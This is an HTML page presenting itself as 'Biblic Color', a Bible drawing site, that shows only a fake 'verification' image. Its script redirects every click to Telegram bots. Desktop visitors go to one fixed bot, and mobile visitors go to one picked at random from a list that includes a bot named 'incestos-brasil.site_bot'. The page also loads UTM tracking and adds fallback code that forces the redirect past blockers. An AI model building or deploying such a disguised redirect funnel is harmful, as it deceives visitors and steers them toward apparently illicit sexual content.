<!doctype html>
<html lang="pt-BR">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Biblic Color - Desenhar</title>

  <!-- Script para capturar UTMs -->
  <script
    src="https://cdn.utmify.com.br/scripts/utms/latest.js"
    data-utmify-prevent-xcod-sck
    data-utmify-prevent-subids
    async
    defer
  ></script>

  <style>
    html, body {
      height: 100%;
      margin: 0;
      background: #ffffff;
      user-select: none;
    }

    .center-viewport {
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100%;
    }

    .center-viewport a {
      display: inline-block;
      text-decoration: none;
    }

    .center-viewport img {
      max-width: 90vw;
      max-height: 90vh;
      width: auto;
      height: auto;
      display: block;
      object-fit: contain;
      cursor: pointer;

      /* Permitir clique na imagem */
      pointer-events: auto;
      user-drag: none;
      -webkit-user-drag: none;
      -moz-user-drag: none;
      -ms-user-drag: none;
    }

    :focus { outline: none; }
  </style>
</head>
<body>
  <div class="center-viewport">
    <a id="redirectLink" href="#" aria-label="Redirecionar">
      <img src="imagens/verification.jpg" alt="" aria-hidden="true" />
    </a>
  </div>

  <script>
    // Link alvo para DESKTOPS/NOTEBOOKS
    const desktopForceLink = "https://t.me/jamilevegashot_bot?start=go";

    // Lista de links para rotação (serão usados em dispositivos NÃO-desktop)
    const links = [
      "https://t.me/churrosmix_pay117q7b_bot?start=go",
      "https://t.me/incestos-brasil.site_bot?start=go",
      "https://t.me/isabellymartinez_bot_bot?start=go",
      "https://t.me/exemplo4_bot?start=go",
      "https://t.me/exemplo5_bot?start=go"
    ];

    // Função simples para detectar mobile (suficiente para a maioria dos casos)
    function isMobileDevice() {
      return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    }

    const linkEl = document.getElementById("redirectLink");

    if (!isMobileDevice()) {
      // Se NÃO for mobile -> forçar o link de desktop
      linkEl.href = desktopForceLink;

      // Adiciona handler de clique para garantir redirecionamento mesmo se algo bloquear o href
      linkEl.addEventListener("click", function(e){
        e.preventDefault();
        // Redireciona na mesma aba
        window.location.href = desktopForceLink;
      });

      // Também permite ativação via teclado (Enter)
      linkEl.addEventListener("keydown", function(e){
        if (e.key === "Enter" || e.keyCode === 13) {
          e.preventDefault();
          window.location.href = desktopForceLink;
        }
      });
    } else {
      // Se for mobile -> usa rotação aleatória normal
      const randomLink = links[Math.floor(Math.random() * links.length)];
      linkEl.href = randomLink;

      // Handler opcional para garantir compatibilidade com bloqueadores
      linkEl.addEventListener("click", function(e){
        // não prevenimos; só garantimos que a navegação ocorra
        // caso alguma coisa tente interceptar podemos forçar:
        setTimeout(()=> {
          if (window.location.href.indexOf(randomLink) === -1) {
            window.location.href = randomLink;
          }
        }, 100);
      });
    }
  </script>
</body>
</html>
